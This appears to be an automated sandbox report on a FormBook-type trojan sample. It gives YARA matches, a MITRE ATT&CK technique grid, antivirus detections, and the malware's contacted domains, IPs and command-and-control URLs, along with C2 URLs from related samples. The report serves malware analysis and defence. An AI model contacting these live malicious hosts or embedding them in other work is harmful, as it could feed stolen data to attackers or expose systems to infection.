Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	DLL Side-Loading1	Process Injection612	Virtualization/Sandbox Evasion3	OS Credential Dumping	Security Software Discovery131	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection612	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information4	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing3	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	System Information Discovery111	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
NQQWym075C.exe	31%	Virustotal		Browse
NQQWym075C.exe	48%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
NQQWym075C.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.2.NQQWym075C.exe.5fe0000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
teelinkz.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.ussouthernhome.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.thrust-board.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.sz360buy.com/d	0%	Avira URL Cloud	safe
http://www.tnicholson.design/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sz360buy.com/o56q/?6l=2CtK5nvmO	0%	Avira URL Cloud	safe
http://www.teelinkz.com/o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.keitakora.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.not-taboo.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX	0%	Avira URL Cloud	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.sabaicraft.com/o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.myreviewandbonuses.com/o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
myreviewandbonuses.com	66.235.200.112	true	true		unknown
www.deadroommn.com	35.186.238.101	true	true		unknown
teelinkz.com	34.102.136.180	true	true	1%, Virustotal, Browse	unknown
keitakora.com	34.102.136.180	true	true		unknown
www.sz360buy.com	160.122.148.234	true	true		unknown
ls3xg13085cb982.dlszywz.com	47.91.170.148	true	false		unknown
ext-sq.squarespace.com	198.49.23.141	true	false		high
shops.myshopify.com	23.227.38.64	true	true		unknown
www.tnicholson.design	65.254.250.119	true	true		unknown
thrust-board.com	34.102.136.180	true	true		unknown
www.sabaicraft.com	192.64.147.164	true	true		unknown
www.houseofhawthorn.com	unknown	unknown	true		unknown
www.bs600mc.com	unknown	unknown	true		unknown
www.ussouthernhome.com	unknown	unknown	true		unknown
www.keitakora.com	unknown	unknown	true		unknown
www.thrust-board.com	unknown	unknown	true		unknown
www.biolineapparel.com	unknown	unknown	true		unknown
www.teelinkz.com	unknown	unknown	true		unknown
www.not-taboo.com	unknown	unknown	true		unknown
www.qzrpxx.com	unknown	unknown	true		unknown
www.myreviewandbonuses.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.ussouthernhome.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB	true	Avira URL Cloud: safe	unknown
http://www.thrust-board.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H	true	Avira URL Cloud: safe	unknown
http://www.tnicholson.design/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a	true	Avira URL Cloud: safe	unknown
http://www.teelinkz.com/o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF	true	Avira URL Cloud: safe	unknown
http://www.keitakora.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw	true	Avira URL Cloud: safe	unknown
http://www.not-taboo.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX	true	Avira URL Cloud: safe	unknown
http://www.sabaicraft.com/o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF	true	Avira URL Cloud: safe	unknown
http://www.myreviewandbonuses.com/o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sz360buy.com/d	wlanext.exe, 00000006.00000002.485637823.00000000034A5000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sz360buy.com/o56q/?6l=2CtK5nvmO	wlanext.exe, 00000006.00000002.485456630.0000000003496000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
66.235.200.112	unknown	United States	13335	CLOUDFLARENETUS	true
35.186.238.101	unknown	United States	15169	GOOGLEUS	true
160.122.148.234	unknown	South Africa	137951	CLAYERLIMITED-AS-APClayerLimitedHK	true
198.49.23.141	unknown	United States	53831	SQUARESPACEUS	false
192.64.147.164	unknown	United States	19867	VOODOO1US	true
23.227.38.64	unknown	Canada	13335	CLOUDFLARENETUS	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
65.254.250.119	unknown	United States	29873	BIZLAND-SDUS	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321308
Start date:	20.11.2020
Start time:	20:12:07
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	NQQWym075C.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@12/0@15/8
EGA Information:	Failed
HDC Information:	Successful, ratio: 53.5% (good quality ratio 49.2%) Quality average: 71.8% Quality standard deviation: 31.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 143 Number of non-executed functions: 189
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 2.18.68.82, 51.104.144.132, 2.20.142.210, 2.20.142.209, 20.54.26.129, 92.122.213.247, 92.122.213.194 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net Report creation exceeded maximum time and may have missing disassembly code information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
35.186.238.101	New Additional Agreement.exe	Get hash	malicious	Browse	www.stockandbarrell.com/bw82/?J2JxbNH=Zr9dh+Ojghb1L1e/pORPvWuTQwqD3K8M6Vqb62ieYdyG8WG8lG/7s6/5fs+LoYF7THMi&BXEpz=Z2Jd8XTPeT
	New Additional Agreement - Commercial and Technical Proposal for Supply.exe	Get hash	malicious	Browse	www.stockandbarrell.com/bw82/?tVm0=Zr9dh+Ojghb1L1e/pORPvWuTQwqD3K8M6Vqb62ieYdyG8WG8lG/7s6/5fvSb0pZAUylzp9ZxLw==&U4kp=Ntx4URGPjVrdVrx
	mFNIsJZPe2.exe	Get hash	malicious	Browse	www.stockandbarrell.com/bw82/?sBZXxj6=Zr9dh+Ojghb1L1e/pORPvWuTQwqD3K8M6Vqb62ieYdyG8WG8lG/7s6/5fs+h3o17XFEi&tHrp=9r7HOjb8jFFtz
	request.exe	Get hash	malicious	Browse	www.toplegallawfirm.com/d8h/?DXaDp=fRmTtjUX8ZQHeF6&1bS=I8xQoUppBoDvKzYHSB5P94IAGgo/a3mjarcEvmq07IJ87QroVVa3muqHCNxKh6DRp2hl
	PO#646756575646.exe	Get hash	malicious	Browse	www.toplegallawfirm.com/d8h/?YL0=I8xQoUppBoDvKzYHSB5P94IAGgo/a3mjarcEvmq07IJ87QroVVa3muqHCORwxrjpzRAi&EhLT5l=9rhdJxHx-Bl
	PpCVLJxsOp.exe	Get hash	malicious	Browse	www.posh-tee.com/d9s8/?Kdnlebm=wtT5wB6vDfWKpHQ2+opxhwshPkt6Ry2ICccTdH8CdSqi9c7YjUx9bKQZOZuVsfJ5JcVD&uZClk=D4ft
	Amacon Company profile & about us.exe	Get hash	malicious	Browse	www.officesplits.com/aqu2/?hbWhmPd=BEj5kt93wyPSdeX8N5io9IKa6SvYcw+QqKy+0SeD3QvCPmxR+dfnVYSf1CTwTQmZboHhrPtb5w==&_TAHxl=ZL3hMDhPFVz
	PO8479349743085.exe	Get hash	malicious	Browse	www.toplegallawfirm.com/d8h/?Jfy=I8xQoUppBoDvKzYHSB5P94IAGgo/a3mjarcEvmq07IJ87QroVVa3muqHCNxg+KzRt0pl&njq0sr=RzuPip
	caNlGGGG6kRIttj.exe	Get hash	malicious	Browse	www.samanthahough.com/cdm/?Txo=O0DPaDpH6xG0tP&H2Jpg6=3aMnj7LffomM9xm98kkuSFNUfnLrlUkoV7W3F45/8qR+nukmFQOoeRDy/pjQLaRWbGrI
	iLividSetup-r1136-n-bi.exe	Get hash	malicious	Browse	download.cdn.installspeed.com/cdn/packs/1/python.exe
	http://govermentbids.com/	Get hash	malicious	Browse	www6.govermentbids.com/?tdfs=1&s_token=1588788601.0021690367&uuid=1588788601.0021690367&kw=Government+Bidding+Opportunities&term=Government%20Bidding%20Opportunities&term=Construction%20Bids&term=Latest%20News%20on%20Business%20Intelligence&backfill=0
	http://softwaredownload.me	Get hash	malicious	Browse	www.regeasycleaner.com/images/banner728x90.gif
	http://byrontorres.com.co/c756mndf090/ZS/?Yerima=NLA&onowu=demian.magalhaes@bmrn.com	Get hash	malicious	Browse	will.co/?from=will.co
	Remittance.doc	Get hash	malicious	Browse	www.urgentloans.today/wh/
	18edd.exe	Get hash	malicious	Browse	www.wildconfession.com/mi/
	HELP_DECRYPT.HTML	Get hash	malicious	Browse	www6.tolotor.com/?s_token=1555948481.0856494941&searchbox=1&showDomain=1&tdfs=1
198.49.23.141	vOKMFxiCYt.exe	Get hash	malicious	Browse	www.themaskedstitcher.com/glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP
	BANK ACCOUNT INFO!.exe	Get hash	malicious	Browse	www.katrinarask.com/sbmh/?FPWlMXx=W647QVGGXcyuIQJd2YRsV4l3KrBdlR6nE0kWwxhnTOMt1o1EWv0jVtfUgI2cf5E+EjKE&AlO=O2JtmTIX2
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	www.floresereis.com/gyo3/?Ez=PS6J2QmalNJ2YJDjbe69AvUeFdUcpOy/3pEgziSDPBkUWsWS6mOmijOfudAWg7zfBEC1B5r2MQ==&lhud=TjfdU2S
	http://f69e.engage.squarespace-mail.com	Get hash	malicious	Browse	f69e.engage.squarespace-mail.com/
	dB7XQuemMc.exe	Get hash	malicious	Browse	www.missteenroyaluniverse.com/nt8e/?wfv=ZReo2Pt2Qe1/UCtjKFtXHq3RWUOi2Gm/wCbn0tZxqkEIYA02TnYAkFkYrty+KIrZCZ6r&Tj=yrIt
	hRVrTsMv25.exe	Get hash	malicious	Browse	www.qlifepharmacy.com/hko6/?XVJpkDH8=GNi/DpI/o0IU2mlIts+MFBAG9T0dMGL590B2ep5La5xhQGCr0BB5YDI5YioaKEegNoVx&V8-DC=02JL1VL0CDLPLTE0
	NzI1oP5E74.exe	Get hash	malicious	Browse	www.kayapallisgaard.com/igqu/?v6=+FdV/Kd4fGUiBuWYNlWEm7YK8cxavEbtySDgdYvfxIiidE6desXWnlu2B7HA/iyauFln7ZyoAg==&1b=V6O83JaPw
	PO.exe	Get hash	malicious	Browse	www.unusualdawg.com/9d1o/?1bm=QkXoOVVmg24y7wxEBap6bO8f6UGaNui7YjNJ7V3V8x8CyLlwzZoXh9kyUu+YoqOVbj3TZFChrA==&sZRd=pBiHDjuxCVPXGhYp
	KZ7qjnBlZF.exe	Get hash	malicious	Browse	www.haloheartdachshunds.com/sub/?ndndn4=RVlTij&AR5=XFWzbX0ToqWBjEsf26ufL7Xq5jBuxaIMiFZhysx3UIjI7XvmT/Bu5040hGTugKhDCWzPxOW3Cg==
23.227.38.64	Order specs19.11.20.exe	Get hash	malicious	Browse	www.revitalizedmassages.com/nwrr/?cj=WWUTrG2H53UDPm4fymhYbZ6FEZ2vv7coSQRaIZEpPnE3OChV57utS9NVtPLJPUKqb/lfOB3tjA==&Rxo=L6hH4NIhfjzT
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	www.greyheartco.com/gyo3/?lhud=TjfdU2S&Ez=VRq/4bhsKv1qlAknrQ5hu7ufPDU/kFASf52Viavgh6mPLKTgLe2AbIuuYHmZ1DmwWuV7SDf/Rg==
	ORDER SPECIFITIONS.exe	Get hash	malicious	Browse	www.bloochy.com/sbmh/?1bm=ml4L1VHx9VtP4&EHL0SXQ=skYwVssfaMrhlhDh0By1+2yNFudwvP+0WfyEru4f7dWeU3QH+Wh99HLFJbrbf46KqAo9+XRR2g==
	anthony.exe	Get hash	malicious	Browse	www.trylolows.com/94sb/?EzrtzfAP=tSe/k2hUbK9JOGMbNEj8EXoWq8Zj/1DbRaCiT8m75tvTcFIe2nO1Yz8/giUKQEiOMvB9&ohrX_=SzrlPD
	udtiZ6qM4s.exe	Get hash	malicious	Browse	www.vrolin.com/nt8e/?VR-X1=lhidFTgXYF182Xr&EVY0dPp=++xYuLJgoH6pp3kD7RvwfttHqcXzQyvEvUgnOCU49uNqHCcn0mAStAECI/W4Fw7pSe42
	qAOaubZNjB.exe	Get hash	malicious	Browse	www.outtheframecustoms.com/9t6k/?kr4Dhdm=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTXxxPEVbHApZiCNZlQ==&uFQl=XP7PnlQx
	uM0FDMSqE2.exe	Get hash	malicious	Browse	www.urbanocity.store/cia6/?7n-DJ=LUkSQMUqYs7d/2/bQOaEkxwm6h1839rWxFY8smdD3nXH8S9l405T6SEnCwX9eUfgpMcI&8pF01J=z2MDIjT0
	new file.exe.exe	Get hash	malicious	Browse	www.petbrushstore.com/o1u9/?njkdnt=Q3jArTzQomb8tYQjs0i35Hd2lVKZ4ZpdhJ9m5dLOjDMMvgJeXKLel0XjPM3NYbPZ3G7K&uFNH=XRlPhLopGJm
	jrzlwOa0UC.exe	Get hash	malicious	Browse	www.oceaneweb.com/t4vo/?Dxlpd=7PaCOu+D6kuoRhra2/DdmZqanQaaV6NiuZJZ0zsrTp0nU//kb+dIKE6P6rtNpgnXIUgzkm08KA==&lhuh=TxlhfFN
	PDF ICITIUS33BUD10307051120003475.exe	Get hash	malicious	Browse	www.thegoddessnow.com/iic6/?DV8TCr-=kpFST7hQkD6Xd0828GyVAB9ShRfCqEmTon+Mjho/+KeKnPgTpIIX+6uaFoMBGmUQlSwJ&U0DH6=kf50d0Dh3Z44mV
